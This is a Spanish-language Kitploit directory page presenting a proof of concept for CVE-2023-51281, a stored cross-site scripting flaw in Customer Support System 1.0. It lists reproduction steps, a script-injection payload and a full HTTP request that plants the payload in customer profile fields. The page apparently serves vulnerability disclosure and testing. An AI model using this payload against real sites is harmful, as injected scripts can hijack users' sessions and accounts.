Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-51281 — Prueba de concepto para múltiples vulnerabilidades XSS almacenadas en Customer Support System 1.0, que demuestra la ejecución arbitraria de scripts mediante payloads manipulados en los campos de perfil del cliente. | Kitploit
Herramientas/GitHubGitHub/geraldoalcantara/cve-2023-51281
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubgeraldoalcantara/cve-2023-51281

CVE-2023-51281

Prueba de concepto para múltiples vulnerabilidades XSS almacenadas en Customer Support System 1.0, que demuestra la ejecución arbitraria de scripts mediante payloads manipulados en los campos de perfil del cliente.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-51281

Customer Support System 1.0 - Vulnerabilidad de Cross-Site Scripting (XSS) Múltiple en los parámetros “firstname”, "lastname", "middlename", "contact" o “address”

Descripción: Múltiples vulnerabilidades de Cross-Site Scripting (XSS) en /customer_support/ajax.php?action=save_customer en Customer Support System 1.0 permiten a atacantes autenticados ejecutar scripts web arbitrarios o HTML a través de un payload manipulado inyectado en los parámetros “firstname”, "lastname", "middlename", "contact" o “address”.

Versión del producto vulnerable: Customer Support System 1.0
Autor del CVE: Geraldo Alcântara
Fecha: 28/11/2023
Confirmado el: 22/12/2023
CVE: CVE-2023-51281
Probado en: Windows

Pasos para reproducir:

  1. Inicie sesión en la aplicación.
  2. Navegue a "/customer_support/index.php?page=customer_list" para editar un cliente existente o "/customer_support/index.php?page=new_customer" para crear un nuevo cliente.
  3. En las páginas de edición de clientes, inserte un payload cuidadosamente manipulado en los parámetros firstname, lastname, middlename, contact o address.
  4. Payload: </dt></b><script>alert(document.domain)</script>

Solicitud:

POST /customer_support/ajax.php?action=save_customer HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------212391604122778812451614149575
Content-Length: 1149
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_customer
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=abige9ar0b1bi3qcf9mkv258o3

-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="id"


-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="firstname"

teste</dt></b><script>alert(document.domain)</script>
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="middlename"


-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="lastname"

xss
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="contact"

210
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="address"

asdasd
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="password"

xss
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="cpass"

xss
-----------------------------212391604122778812451614149575--

Descubridor(es)/Créditos:
Geraldo Alcântara

Descargar herramienta